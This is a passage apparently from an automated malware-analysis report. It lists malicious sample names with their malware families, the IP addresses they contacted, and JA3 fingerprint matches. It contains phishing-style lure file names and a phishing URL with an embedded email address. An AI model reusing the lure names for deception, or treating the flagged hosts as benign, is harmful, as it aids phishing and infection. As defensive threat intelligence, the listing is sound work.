                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    CLOUDFLARENETUSInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.144.37
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    https://qrsu.io/ONKMxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    PO_L202503042.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.186.31
                                                                                                                                                    ORACLE-BMC-31898US2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    8QeI7CboDY.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 132.145.140.102

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9ad2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    Order 20201103.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Steam.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                                                                                                    • 149.154.